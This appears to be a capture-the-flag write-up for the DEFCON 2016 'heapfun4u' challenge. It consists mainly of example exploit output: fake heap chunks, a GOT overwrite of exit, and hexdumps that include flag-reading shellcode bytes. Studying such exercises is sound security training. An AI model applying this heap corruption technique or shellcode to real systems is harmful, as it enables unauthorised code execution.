# DEFCON CTF Qualifiers 2016 -- heapfun4u Exploit Write-Up

The [write-up is the exploit](#file-exploit-py).

## Example Output

```
[*] './heapfun4u'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE
[x] Starting program './heapfun4u'
[+] Starting program './heapfun4u': Done
[*] Allocated 4064 bytes (index: 1)
[*] Freeing buffer 1
[*] Allocated 16 bytes (index: 2)
[*] Allocated 16 bytes (index: 3)
[*] Allocated 16 bytes (index: 4)
[*] Freeing buffer 3
[*] Heap layout:
    heap[1]: 0x2aaaaaad5008 [4064 bytes]
    heap[2]: 0x2aaaaaad5008 [16 bytes]
    heap[3]: 0x2aaaaaad5020 [16 bytes]
    heap[4]: 0x2aaaaaad5038 [16 bytes]
[*] Fake heap chunks created
    Chunk @ 0x2aaaaaad5018
            Size: 0x10
            List: 0x2aaaaaad5020
                Prev: 0x0
                Next: 0x2aaaaaad5030
    Chunk @ 0x2aaaaaad5030
            Size: 0x20
            List: 0x2aaaaaad5048
                Prev: 0x2aaaaaad5018
                Next: 0x2aaaaaad5058
    Chunk @ 0x2aaaaaad5058
            Size: -0x2aaaaa4d2ff8
            List: 0x602058
                Prev: 0x2aaaaaad5030
                Next: 0x0
[*] Overwriting exit@got: 0x602060
[*] Writing data to buffer 1
[*] 2aaaaaad5008  61 61 61 61  62 61 61 61  63 61 61 61  64 61 61 61  │aaaa│baaa│caaa│daaa│
    2aaaaaad5018  12 00 00 00  00 00 00 00  30 50 ad aa  aa 2a 00 00  │····│····│0P··│·*··│
    2aaaaaad5028  00 00 00 00  00 00 00 00  22 00 00 00  00 00 00 00  │····│····│"···│····│
    2aaaaaad5038  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  │····│····│····│····│
    2aaaaaad5048  58 50 ad aa  aa 2a 00 00  18 50 ad aa  aa 2a 00 00  │XP··│·*··│·P··│·*··│
    2aaaaaad5058  0a d0 b2 55  55 d5 ff ff  00 00 00 00  00 00 00 00  │···U│U···│····│····│
    2aaaaaad5068  30 50 ad aa  aa 2a 00 00                            │0P··│·*··││
    2aaaaaad5070
[*] Allocated 32 bytes (index: 5)
[*] Writing data to buffer 1
[*] 2aaaaaad5008  61 61 61 61  62 61 61 61  63 61 61 61  64 61 61 61  │aaaa│baaa│caaa│daaa│
    2aaaaaad5018  68 66 6c 61  67 6a 02 58  48 89 e7 31  f6 99 0f 05  │hfla│gj·X│H··1│····│
    2aaaaaad5028  41 ba ff ff  ff 7f 48 89  c6 6a 28 58  6a 01 5f 99  │A···│··H·│·j(X│j·_·│
    2aaaaaad5038  0f 05 6a 3c  58 0f 05                               │··j<│X··│
    2aaaaaad503f
[x] Recieving all data
[x] Recieving all data: 0B
[*] Program './heapfun4u' stopped with exit code 1
[x] Recieving all data: 16B
[+] Recieving all data: Done (16B)
[+] THIS_IS_THE_FLAG

```